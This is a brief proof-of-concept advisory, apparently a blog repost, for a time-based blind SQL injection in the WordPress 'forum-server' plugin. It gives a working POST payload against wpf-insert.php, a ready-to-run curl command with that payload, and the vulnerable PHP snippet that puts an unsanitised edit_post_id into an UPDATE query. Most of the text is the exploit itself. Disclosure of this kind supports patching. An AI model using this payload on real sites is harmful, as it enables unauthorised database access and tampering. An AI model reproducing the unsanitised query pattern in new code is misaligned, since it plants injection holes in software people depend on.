—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php
edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20&subject=1&content=1&thread_id=1
e.g.
curl –data "edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20&subject=1&content=1&thread_id=1" http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php
—————
Vulnerable code
—————
if(isset($_POST[‘edit_post_submit’])){
$subject = $vasthtml->input_filter($_POST[‘edit_post_subject’]);
$content = $vasthtml->input_filter($_POST[‘message’]);
$thread = $vasthtml->check_parms($_POST[‘thread_id’]);
$edit_post_id = $_POST[‘edit_post_id’];
…
$sql = ("UPDATE $vasthtml->t_posts SET text = ‘".stripslashes($content)."’, subject = ‘".stripslashes($subject)."’ WHERE id = $edit_post_id");
$wpdb->query($sql);
0 条评论。